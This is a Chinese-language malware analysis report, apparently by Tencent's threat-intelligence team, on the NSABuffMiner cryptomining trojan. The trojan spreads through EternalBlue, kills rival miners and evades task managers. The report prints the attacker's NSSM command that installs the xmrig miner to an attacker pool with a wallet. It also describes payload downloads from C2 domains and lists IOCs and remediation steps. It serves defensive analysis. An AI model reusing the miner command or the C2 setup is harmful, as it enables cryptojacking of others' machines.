NSABuffMiner挖礦木馬霸佔某校園伺服器,非法獲利115萬元

0x1 背景
近期騰訊御見威脅情報中心接到用戶反饋，某學校內網水卡管理伺服器被植入名為rundllhost.exe的挖礦木馬。分析後發現該木馬是NSASrvanyMiner挖礦木馬的變種，此木馬同樣利用NSA武器工具在內網攻擊傳播，而該伺服器存在未修復的ms17-010漏洞，因此受到攻擊被利用挖礦。

該木馬傳播NSA武器工具包的釋放目錄：C:\Windows\IIS\，其中一個C2通信地址： posthash.org均與NSASrvanyMiner相同，因此我們認為此挖礦木馬是NSASrvanyMiner的變種。

而基於此挖礦木馬不再利用微軟的srvany.exe文件進行啟動，而是使用NSSM服務管理工具加載，且使用另外兩個C2域名（da.alibuf.com/bmw.hobuff.info）下載挖礦木馬和NSA攻擊模塊，使用礦池地址（x.alibuf.com:443），將其命名為NSABuffMiner。

查詢NSABuffMiner挖礦木馬使用錢包信息，發現該錢包累計挖礦已獲得收益高達115萬元人民幣。

受攻擊伺服器進程列表

NSABuffMiner挖礦木馬配備了功能強大的NSA工具包，以便在內網攻擊傳播。該木馬為獨佔系統挖礦資源，會查殺30餘個同樣是挖礦木馬的進程，在自己入侵成功之後，還會將135、137、138、139、445等危險埠關閉。其目的是防止其他挖礦木馬順路入侵，再和自己爭搶挖礦資源。

NSABuffMiner挖礦木馬會檢測多個任務管理器的進程，一旦用戶發現系統異常，啟用（Taskmgr.exe、Autoruns.exe、360taskmgr.exe、Perfmon.exe、Procxp.exe、processHacker.exe）等任務管理器查看系統資源佔用情況時，木馬會立刻嘗試關閉任務管理器。若關閉失敗，木馬會立刻退出。

騰訊御見威脅情報中心提醒企業網管，及時修補內網系統高危漏洞，可配置密碼策略，強制內網用戶使用複雜密碼。這些存在漏洞的系統若被黑客攻擊控制，除了可能感染挖礦木馬，還可能被竊取資料、植入勒索病毒，造成更加嚴重的後果。

0x2 詳細分析

0x2.1 NSA攻擊
木馬運行後在C:\windows\IIS\目錄釋放66個子文件，攻擊時先關閉防火牆，然後啟動CPUInfo.exe掃描內網機器的445埠，如果埠處於打開狀態則利用多個NSA武器工具（Eternalblue等）對目標機器進行攻擊，若攻擊成功，則根據不同系統版本在受害機器上執行payload(x86/x64.dll),x86/x64.dll執行後從C2地址繼續下載挖礦和NSA攻擊模塊並安裝執行。

將CPUInfo.exe安裝為計劃任務「GooglePinginConfigs」，並將計劃任務文件設置屬性為隱藏。

攻擊主進程CPUInfo.exe關閉防火牆，掃描內網IP並使用NSA武器工具：Eternalblue(永恆之藍),Doubleplsar(雙脈衝星)、EternalChampion(永恆冠軍)、Esteemaudit（RDP漏洞攻擊）對內網機器進行攻擊，若攻擊成功則植入DllPayload:x64/x86.dll。

攻擊結束後free.bat清理攻擊進程，重啟計劃任務

0x2.2 Payload分析

0x2.2.1 Install.exe
攻擊後植入的payload(x86/x64/dll)運行後從da.alibuf.com下載NSA攻擊包安裝程序445.exe，保存為C:\Windows\Install.exe並啟動安裝。

Install.exe重新安裝攻擊模塊到IIS目錄，從而繼續挖礦和感染。

0x2.2.2 mask.exe
payload(x86/x64/dll)運行後從da.alibuf.com下載挖礦安裝包程序mado.exe，保存為C:\Windows\mask.exe並啟動安裝。

mask.exe啟動demo.bat

C:\windows\demo.bat通過wmic指令對同行挖礦木馬查殺，以獨享挖礦資源。

此挖礦木馬在清除其他同行挖礦木馬方面可謂做足了工作，通過查找疑似挖礦木馬，累計清除10餘個目錄下30餘個進程名。

查找並殺死進程

wbmoney.exe
GGtbviewer.exe
lservice.exe
ystmss.exe
wuauc1t.exe
Systmss.exe
1.exe
2.exe
3.exe
nanol.exe
svchostr.exe
csrss..exe
wax.exe
Qrhkveb.com
Tnntknl.com
Snwhtdw.bat
dllhsot.exe
Tasksvr.exe
serices.exe
seever.exe
mssecsvc.exe
svchsot.exe
lsacs.exe
nsa.exe
csrs.exe
svchost.exe
server.exe
conhost.exe
csrss.exe
expl0rer.exe

查找可疑路徑

C:\windows\svchost.exe
C:\program files (x86)\stormii\server.exe
C:\program files (x86)\windows nt\conhost.exe
C:\Windows\svchost.exe
C:\ProgramData\dll\svchost.exe
C:\ProgramData\dll\csrss.exe
C:\ProgramData\expl0rer.exe
C:\ProgramData\Natioanl\svchostr.exe
C:\ProgramData\Microsoft\Natihial\cmd.exe
C:\ProgramData\Microsoft\Natioanl\csrss..exe
C:\ProgramData\nm\winlogin.exe
C:\Windows\Fonts\explorer.exe
C:\Windows\Fonts\conhost.exe
C:\Windows\SecureBootThemes\Microsoft\svchost.exe
C:\windows\sysprepthemes\microsoft\svchost.exe
C:\Windows\SpeechsTracing\Microsoft\svchost.exe
C:\ProgramData\Natihial\svshostr.exe
C:\ProgramData\new\csrss.exe
C:\ProgramData\new\csrss.exe

腳本會繼續關閉135，137，138，139，445埠，避免其他挖礦木馬入侵機器。

然後從另一個C2地址bmw.hobuff.info:3下載sogou.exe、360safe.exe等木馬進而挖礦和新一輪感染。

 

0x2.3 挖礦
受感染機器下載的挖礦木馬釋放svchost.exe、wininit.exe、rundllhost.exe到C:\Windows\Fonts目錄，其中svchost.exe是NSSM安裝程序，wininit.exe是礦機啟動程序，rundllhost.exe是xmrig礦機。

啟動礦機前嘗試結束以下監控或分析工具：

Taskmgr.exe、Rundll32.exe、Autoruns.exe、Perfmon.exe、Procxp.exe、processHacker.exe

如果仍然檢測到以下進程則退出挖礦程序：

Taskmgr.exe、Rundll32.exe、Autoruns.exe、Perfmon.exe、Procxp.exe、processHacker.exe

礦機rundllhost.exe採用開源挖礦木馬xmrig 2.5.2編譯
 

啟動礦機命令行如下，啟動時使用NSSM服務管理工具將礦機安裝為系統服務，此工具具有自動守護目標服務進程功能，能維持挖礦進程運行，同時可以躲避部分殺軟檢測。

c:\windows\Fonts\svchost.exe install Samserver rundllhost.exe -o x.alibuf.com:443 -u 45c2ShhBmuk6ukfdTLok59U86gWLXZo8kDJbpTm8uYT1U 35mig1pUCbd6796AJviTPXetFrUo37XFGcEYU1k3tYe32o9qEr -p x -k

礦池：x.alibuf.com:443，礦池地址實際通過CNAME解析到pool.minexmr.com。

錢包：45c2ShhBmuk6ukfdTLok59U86gWLXZo8kDJbpTm8uYT1U35mig1pUCbd6796AJviTPXetFrUo37XFGcEYU1k3tYe32o9qEr

錢包信息：

查詢錢包信息，發現目前已挖礦獲得門羅幣1217.9720個，當前價格折合人民幣1150788.73元
 

0x3 安全建議

1、伺服器關閉不必要的埠，例如139、445埠等。

2. 手動安裝「永恆之藍」漏洞補丁請訪問以下頁面
https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
其中WinXP，Windows Server 2003用戶請訪問
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

3、企業用戶建議全網安裝御點終端安全管理系統
（https://s.tencent.com/product/yd/index.html）。御點終端安全管理系統具備終端殺毒統一管控、修復漏洞統一管控，以及策略管控等全方位的安全管理功能，可幫助企業管理者全面了解、管理企業內網安全狀況、保護企業安全。

4、個人用戶推薦使用騰訊電腦管家，攔截此類病毒攻擊。

IOCs

C2（部分）

124.232.138.166:3
61.130.31.174:3
221.130.176.203
60.191.206.66
67.229.157.146
220.194.215.229
bmw.hobuff.info:3
da.alibuf.com:3
d.honker.info:3
dnn.alibuf.com:7723
dns.alibuf.com:7723
amd.alibuf.com:7723

礦池地址：

x.alibuf.com:443

錢包地址：

45c2ShhBmuk6ukfdTLok59U86gWLXZo8kDJbpTm8uYT1U35mig1pUCbd6796AJviTPXetFrUo37XFGcEYU1k3tYe32o9qEr

md5

2cdda243568a10b34936220ebe9b3995
f36fbb000aca01302c74895936b818b3
7f142f5e800096af5de5160ba5caa91e
9ae5a6b60a3f29e14aa2b29a03e55bc8
db39c2043a72537274d4f92b2240fd9c
a755f76611af191caac97da04633b012
1b41317b15287ab681defabc66ef638b
d83c9f5919915fc6c54276d6d0e79bf4
36543e571a50ac91acd5c9e9c5de36fb
064ede68095b3ab5d8a22da2d1e59c02
2e332960bf1feb4aa90b156322c7e98d
d376172100a4cf4e91531277cc368294
931350ab9d8c235f48219c4e126bd6cd
1065f9b7c189f4a22d7f11626f16b976
7add4dd082e2e84ea7ea41a48a267450
584c2211a059c4018d2eddf8f669d63d

f8408d85ade39d73c3c4bdf692a26c01
a94ecd370a2bae1381a40c9b6d7a300c
27c1f49ad677dff41ed3537e9e299868
081f10718d76c9b3b19901f0ee630960
04c5dab014e1b8640ce9ea9580bb0b09
e9c6bf0de42aa2449f1ed4bbb50ddcd6
a17bd95441d3fa37660e87842dc896aa
9feecd709f395bd8a0d1d3a2e77d2e34
857fc3145d5aee4399bf6c9fd9dc8245
69833a3ecc52f57a02656d46e1799dcc
11275993a1a8f44371ab48820422b273
596a05756e87176b56d205fd38f2947e
d1d15aa8d749e61a06c8ed04454827b3
7ac8d07cec8264b00139f5575c3a4a71
8a4e9f688c6d0effd0fa17461352ed3e
b8af096248b3e7283f69a6c668609408

c673e31da52314ac65e583f8409f097e
ce5f524f8dc3c01ad7e67a21d0d6a754
e2108aa70c161208ffdcbf5c60a862cc
9aa087a88e766a49a9d4ae0a5e8c2b02
29f15fd8103a69e81fde23e4592baa60
37a98c6150d2317eb6e0df1516a5b3a4
873c5bc9bbf95db1b4e51374231245ae
a28e6a0150d00c0cbcf6b11e70b384cf
d42b7eb22678a6c35674fde3aaae0cb3
56398c3eb7453017af674ab85df17386
6852f47732e3560f997af626094a5a99
6e1bbd373fc929f83160d4a40ce09d65
8f55f1381ce6bc1a4ee50bde5895b3a1

了解騰訊企業級安全產品

騰訊御見威脅情報中心誠邀各路英豪加盟